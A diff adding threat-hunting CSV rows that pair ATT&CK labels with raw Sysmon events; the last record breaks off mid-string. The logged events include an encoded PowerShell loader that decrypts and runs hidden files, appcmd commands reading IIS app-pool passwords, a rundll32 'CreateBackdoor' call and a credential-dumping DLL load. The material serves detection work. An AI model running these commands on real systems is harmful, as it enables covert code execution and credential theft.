+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.350815Z"">
+    </TimeCreated>
+    <EventRecordID>5889</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.310</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00109767FF00</Data>
+    <Data Name=""ProcessId"">3096</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
+    </TimeCreated>
+    <EventRecordID>243550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
+    <Data Name=""ProcessId"">8160</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T21:45:04.922610Z"">
+    </TimeCreated>
+    <EventRecordID>244866</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2844"" ThreadID=""3648"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 21:45:04.909</Data>
+    <Data Name=""ProcessGuid"">747F3D96-8AE0-5E76-0000-0010933B8003</Data>
+    <Data Name=""ProcessId"">7708</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\Public\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-06A4-5E76-0000-002087DE0200</Data>
+    <Data Name=""LogonId"">0x2de87</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-06AA-5E76-0000-001046E10400</Data>
+    <Data Name=""ParentProcessId"">4668</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.128.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-13T18:03:21.212898Z"">
+    </TimeCreated>
+    <EventRecordID>17289</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""276"" ThreadID=""2056"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-13 18:03:20.485</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">IEWIN7</Data>
+    <Data Name=""SourcePort"">49159</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.128.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
+    </TimeCreated>
+    <EventRecordID>243550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
+    <Data Name=""ProcessId"">8160</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:34.168542Z"">
+    </TimeCreated>
+    <EventRecordID>25</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:34.138</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Cryptography Manager</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:34.168542Z"">
+    </TimeCreated>
+    <EventRecordID>25</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:34.138</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Cryptography Manager</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.270700Z"">
+    </TimeCreated>
+    <EventRecordID>5886</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.230</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010D763FF00</Data>
+    <Data Name=""ProcessId"">3240</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGg